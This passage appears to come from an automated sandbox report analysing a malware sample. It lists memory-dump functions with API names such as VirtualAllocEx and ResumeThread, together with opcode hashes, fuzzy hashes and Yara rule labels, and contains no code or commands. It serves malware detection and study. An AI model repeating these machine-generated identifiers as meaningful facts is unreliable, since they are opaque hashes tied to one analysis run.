                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE10F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 7b6b18692e1483ccb7ad41a1ec1a04f4c57408699b4aa4ce805ac67d748f4995
                                                                                      • Instruction ID: 08670e31f9cd285966ea36a175d8372882fb239ddc252513f447aadb57d408a8
                                                                                      • Opcode Fuzzy Hash: 7b6b18692e1483ccb7ad41a1ec1a04f4c57408699b4aa4ce805ac67d748f4995
                                                                                      • Instruction Fuzzy Hash: E91167718002489FCB10DFAAC845BDFBFF5EF88324F108419E519A7250C735A584CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE0EF9 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 5077ee0d22013d2e849f57efe6e3449779e89dba37b0cda16ae80119bd44b3a6
                                                                                      • Instruction ID: 6f4dd1457c82d66db4f98805a00b5f216c6bda3e5ba72dd6e212c0debd8cd8fc
                                                                                      • Opcode Fuzzy Hash: 5077ee0d22013d2e849f57efe6e3449779e89dba37b0cda16ae80119bd44b3a6
                                                                                      • Instruction Fuzzy Hash: DC1146B19003488FCB20DFAAC4457DEFBF4EB88324F248419D459A7240CB79A544CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0227CE40 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0227DB0C), ref: 0227DD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 61a7beba7841cadaca963964f7794a364d771cb9dfea93ad4759ace49f0c2943
                                                                                      • Instruction ID: e57eafd8f185d1a9009e01aeb0ba79b2784125b80ce2975a776811bc84c54cd6
                                                                                      • Opcode Fuzzy Hash: 61a7beba7841cadaca963964f7794a364d771cb9dfea93ad4759ace49f0c2943
                                                                                      • Instruction Fuzzy Hash: A7112DB68043498BDB10DF9AD544B9EFBF4AF89224F10842AE819B7210C378A545CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE0F00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: b47c8ea426d3b4256a8ca1357662a71797b8168993611f555590cf8e8d617e07
                                                                                      • Instruction ID: d1cda90afbfe3581593fb6140ad9623f59ad5c06c70a8729b64cf2d0d561c961
                                                                                      • Opcode Fuzzy Hash: b47c8ea426d3b4256a8ca1357662a71797b8168993611f555590cf8e8d617e07
                                                                                      • Instruction Fuzzy Hash: FA1136B1D003488FCB20DFAAD4457EEFBF4EB88324F248429D459A7250CB79A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53A6C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 502ccd70d24e17e613b8aa135381e4024672e2504c4755385d3db0ab626a4b09
                                                                                      • Instruction ID: bbde381c13857bb5f0c3a12f5b5c876d0982000e2ee1d8009dcb30ff3ed327df
                                                                                      • Opcode Fuzzy Hash: 502ccd70d24e17e613b8aa135381e4024672e2504c4755385d3db0ab626a4b09
                                                                                      • Instruction Fuzzy Hash: 1C418F31B002158FCB15EFB998889AEBBF7EFC4360B258929E469DB351EB34DD058750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A536C0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      • Opcode ID: b236013bf4defc8abe6989f78bac2e6c24da8a84005fb3652ab85a3afc1b4309
                                                                                      • Instruction ID: 81a963c23627c141360b5f0b4e6c12c3a78202b2f0c4c9d05a92dedefc27840e
                                                                                      • Opcode Fuzzy Hash: b236013bf4defc8abe6989f78bac2e6c24da8a84005fb3652ab85a3afc1b4309
                                                                                      • Instruction Fuzzy Hash: 41418BB0E24609EFDB88DF95D6858AEBFF1FF89200F61D495D445A7318E7309A11CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A536D0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      • Opcode ID: c69beb42391618f8c44153ec2434f9b2d9418b3e6df60b3a14d6e38a59b6fecd
                                                                                      • Instruction ID: ff380a61cd264d6b45d43ef9eeee7158d5304408e2d409e605f9d6df961201a2
                                                                                      • Opcode Fuzzy Hash: c69beb42391618f8c44153ec2434f9b2d9418b3e6df60b3a14d6e38a59b6fecd
                                                                                      • Instruction Fuzzy Hash: 10416C70E24209EFDB88DF95D6858AEFFF1FF89240B61D895D405A7318E7309A11CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5B271 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 7f42913bfc3b57f72257af35f60c9bcd43a7a20315e6f2c6b83156c23a5c223f
                                                                                      • Instruction ID: 4bfd9805b4eb37867a6cf5f50cffffc3a79554ac40b5ee41d237e0f76cec9a83
                                                                                      • Opcode Fuzzy Hash: 7f42913bfc3b57f72257af35f60c9bcd43a7a20315e6f2c6b83156c23a5c223f
                                                                                      • Instruction Fuzzy Hash: 0131B474E04608CFDB48DFA6C9556EEBBF6BF89301F20D02AD419AB358DB7459058B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5B280 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: fde4509821b3e055a46172fd79005fd0a66474a6564d3d51b5b16c6d8461b15f
                                                                                      • Instruction ID: c1db65e0f479af88c854404bb08db698c2d00e3c670a46f9268ae0d8d3fd191f
                                                                                      • Opcode Fuzzy Hash: fde4509821b3e055a46172fd79005fd0a66474a6564d3d51b5b16c6d8461b15f
                                                                                      • Instruction Fuzzy Hash: 1A31C574E04208CFDB48DFAAC9546EEFBF6BF89301F10D02AD819AB358DB7459058B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A51520 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5
                                                                                      • API String ID: 0-3899204960
                                                                                      • Opcode ID: 92b6147033b0852603f2ba287864409ea12c5290761cd77b5ff5dde334e5ebf2
                                                                                      • Instruction ID: 9b93c91952d2bbe8b86ac1203fd6b36ee9059087b2375cdcd1e737c5f67b4c17
                                                                                      • Opcode Fuzzy Hash: 92b6147033b0852603f2ba287864409ea12c5290761cd77b5ff5dde334e5ebf2
                                                                                      • Instruction Fuzzy Hash: 5E21697091524ACFCB49DFA9C5806AEFBF1FF8A300F24C1AAD545AB251D7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53A5C Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 62dd9764f0e5e59579a89879115e36ff8a06db8c164805d6a3e062f964e493df
                                                                                      • Instruction ID: f703c3ff55eb55ecaba27ffc93bdd5bbd7af245b4b9ba8b6670370c64190e324
                                                                                      • Opcode Fuzzy Hash: 62dd9764f0e5e59579a89879115e36ff8a06db8c164805d6a3e062f964e493df
                                                                                      • Instruction Fuzzy Hash: CF113D71F1020A8BCB94EBB999505FEB6F2AFC4310B55447AD905EB244EF35CE05CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5B3DF Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: eb63c0a55ef49da0392666f77a0f8e843f5bf5d88fc563b63789c9fc9a877d75
                                                                                      • Instruction ID: d3f13c302b94bea9dec71c2f3150c4b512b6df6874f95085b3896b95afeb155c
                                                                                      • Opcode Fuzzy Hash: eb63c0a55ef49da0392666f77a0f8e843f5bf5d88fc563b63789c9fc9a877d75
                                                                                      • Instruction Fuzzy Hash: 37114D75E002198FCF09DFE9C9849ADBBB2FB88310F20812AE919AB355D735A955CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5E8B6 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .e
                                                                                      • API String ID: 0-2449113350
                                                                                      • Opcode ID: d8fa8a637e381b62afe1131a02a9985ef12b50c70dc96f5765514866b05b9fc3
                                                                                      • Instruction ID: 18bc393bfef6b7b79cc7ed0a146984e917811ae9fef36aa6b14471d489d72d3e
                                                                                      • Opcode Fuzzy Hash: d8fa8a637e381b62afe1131a02a9985ef12b50c70dc96f5765514866b05b9fc3
                                                                                      • Instruction Fuzzy Hash: 72F08CB8D40205CFDB80FBA0DC4459DBBB6FFC5204B245615980A9F316EA318802CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53568 Relevance: .1, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c93684b9a073cfe4158dff0100e3f72cd6323a3162583bbe66b13ec7515cbea
                                                                                      • Instruction ID: 077d317b0f204031d192bca1b23f6e184a0adf457f27636c90ee695c4e920142
                                                                                      • Opcode Fuzzy Hash: 0c93684b9a073cfe4158dff0100e3f72cd6323a3162583bbe66b13ec7515cbea
                                                                                      • Instruction Fuzzy Hash: 54419BB49197848FC70ACB69D440988BFB0EF8A211F1A91D6D484CF7B3DA35A956CB13
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5CB68 Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e8e2871a220b087bc219c7b6ab93abb39d6757e900168354e9f4332939ad498
                                                                                      • Instruction ID: 428c871e7bb7cb99ca41220b7157138f9be15739112a27d53d4cdadf21b0711a
                                                                                      • Opcode Fuzzy Hash: 6e8e2871a220b087bc219c7b6ab93abb39d6757e900168354e9f4332939ad498
                                                                                      • Instruction Fuzzy Hash: CB411D70909308CFDB84EF6AC5445EDBBFAFB4D311F229059D80AA721AD734AA41CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5BA50 Relevance: .1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd1747f174369b38f5165cdaff8e4819569dff1d4cc5c56e0a1e4ca0f12b9730
                                                                                      • Instruction ID: 5ea3b31390e9ac4b8e09af0ae4a9b3cca3889f41c4581e733dba648c65c2ec97
                                                                                      • Opcode Fuzzy Hash: cd1747f174369b38f5165cdaff8e4819569dff1d4cc5c56e0a1e4ca0f12b9730
                                                                                      • Instruction Fuzzy Hash: E0315C70D08209CFDB48EF9AD5506BEFBF6EB8D302F25E025E819A7242D7704901CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53848 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8a6dd985bfd1923bee4dd7c9c5e0aeb8a510ae3181df45d7a1c2de09d3d50c7
                                                                                      • Instruction ID: a7d3c032d75e104592580a169a75e8bf8d81720ed18340fbe32cedd131b49d5f
                                                                                      • Opcode Fuzzy Hash: c8a6dd985bfd1923bee4dd7c9c5e0aeb8a510ae3181df45d7a1c2de09d3d50c7
                                                                                      • Instruction Fuzzy Hash: 834179B5E0020ADFCF48DF95D941AEEBBB2FF88310F249529D905AB350D7749A418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53858 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b1283551bdb3e53ceb7ede2e4f9fbd17933ee15a5f4d881d002ad2f144d303d
                                                                                      • Instruction ID: 3ffb58d7e9120daa4e20db2dd206aa6a317093b6d56f96f535375d56af94f887
                                                                                      • Opcode Fuzzy Hash: 2b1283551bdb3e53ceb7ede2e4f9fbd17933ee15a5f4d881d002ad2f144d303d
                                                                                      • Instruction Fuzzy Hash: F3417EB5E0420ADFCF48DF95D9419EEBBB2FF89310F209529D905AB350D7709A41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A58A68 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0204f75bf008961bc6483f5411e230831939dee1ecf2f364b5325fdaea1ec48
                                                                                      • Instruction ID: ac997213dd7480b243acdfe4d7c06d36af7c57dbdf4b7ba45313bd2fece439e5
                                                                                      • Opcode Fuzzy Hash: e0204f75bf008961bc6483f5411e230831939dee1ecf2f364b5325fdaea1ec48
                                                                                      • Instruction Fuzzy Hash: 92418070A09225DFD380FB69C845A7AB7F5AB44311F4781B6EA15DB2D6C338D840CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A56B40 Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4219f4eeef0e9dddc96554bce90c55e47572308902aa62a2dd81e1ae85542b1
                                                                                      • Instruction ID: 671be6252c52a7471a90c3645b2f07d0868c0a33cdae615f2e5f512c787765a4
                                                                                      • Opcode Fuzzy Hash: e4219f4eeef0e9dddc96554bce90c55e47572308902aa62a2dd81e1ae85542b1
                                                                                      • Instruction Fuzzy Hash: 23313A75900208AFCB50EFA9D844ADEBFF5EB49310F11846AE919E7311D735E940CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CD06C Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 816765c61e167e4b198240c60aa1203062796a866f71258607a784c0109830e6
                                                                                      • Instruction ID: 90685712975879d30e6ff5967fac3e502fd1f81fe99ccc1833e20857cd13bd59
                                                                                      • Opcode Fuzzy Hash: 816765c61e167e4b198240c60aa1203062796a866f71258607a784c0109830e6
                                                                                      • Instruction Fuzzy Hash: CC21F471504244EFCB259F18D9C4F16BFA5FB98314F24827DE9090A255C33EDC56CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5CBC3 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42b193815a2682d3633063ba70a2c8c6249c789dd92784f8ef1106d82ab8baa6
                                                                                      • Instruction ID: c57c9c38d369668e75e7bc85a82b1b1ce97c170ed89d5d54dfcf95b4308afd4f
                                                                                      • Opcode Fuzzy Hash: 42b193815a2682d3633063ba70a2c8c6249c789dd92784f8ef1106d82ab8baa6
                                                                                      • Instruction Fuzzy Hash: CB314970909349CFCB44DFA6C5406EDBFF2EB4A310F1590AAD40AA7256DB349541CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007DD01C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c078df74af853de01458e678431adf45557e0e8742ac5dc76257c08803a1bdde
                                                                                      • Instruction ID: 9692795ed759b208a7df4a98591378dca6d5a7c057339bc66fb1ab5ba7042386
                                                                                      • Opcode Fuzzy Hash: c078df74af853de01458e678431adf45557e0e8742ac5dc76257c08803a1bdde
                                                                                      • Instruction Fuzzy Hash: A421D071604204DFCB24DF24D984B26BBB5EB88314F24C56AD80A4B396C33ADC46CA61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007DD2F0 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847784384.00000000007DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7dd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a75674703b4ec6590f8a170a11c55f100e67101bcf1a5ee0db367ecca190f99d
                                                                                      • Instruction ID: 0eb1840da74dbc3deb934fc3c5f38d36d70463978847a8128403c985d2d60abe
                                                                                      • Opcode Fuzzy Hash: a75674703b4ec6590f8a170a11c55f100e67101bcf1a5ee0db367ecca190f99d
                                                                                      • Instruction Fuzzy Hash: 6121C2B1604244EFDB24DF14D9C4B26BBB5EB84314F24C56AD8494B356C33ADC46CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5CC11 Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 760749e5a37b2d0c659a39641f47509ae5e14247d3a6e5bb8713d2a90d7312d9
                                                                                      • Instruction ID: 130926ed22e8b3196e9035673fd54938c57bb601ddb63df2aca422e6e9813969
                                                                                      • Opcode Fuzzy Hash: 760749e5a37b2d0c659a39641f47509ae5e14247d3a6e5bb8713d2a90d7312d9
                                                                                      • Instruction Fuzzy Hash: E6213B74904309CFDB44EF99C5849EDBFF9FB4D311B229058E81AA7206D734A981CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A55B7C Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a74b6ed3cd18ebc094bd590532e8f40c49ae05a05e8436afa49a563557f2697
                                                                                      • Instruction ID: f6c33065496ed6719ed71cb5bbf77275a3a1ad437bbe22e1caba7bfc53cfcd8a
                                                                                      • Opcode Fuzzy Hash: 1a74b6ed3cd18ebc094bd590532e8f40c49ae05a05e8436afa49a563557f2697
                                                                                      • Instruction Fuzzy Hash: 9C31E3B0D11218DFDB60DF99C584BCEBBF4AB08314F24842AE804BB250C7756885CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53C0C Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 307ece7289732a9af992e6dbb83084d9051e61360fbca48ac729af3c28614de8
                                                                                      • Instruction ID: ef5661cfc1df63b41768624609f7fc8102a5efae626d4fec5f2ea82b3229df07
                                                                                      • Opcode Fuzzy Hash: 307ece7289732a9af992e6dbb83084d9051e61360fbca48ac729af3c28614de8
                                                                                      • Instruction Fuzzy Hash: 1931D2B4D01218DFDB60DF99C588BDEBFF4AB08314F25846AE804BB250C7B56885CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5C0D1 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
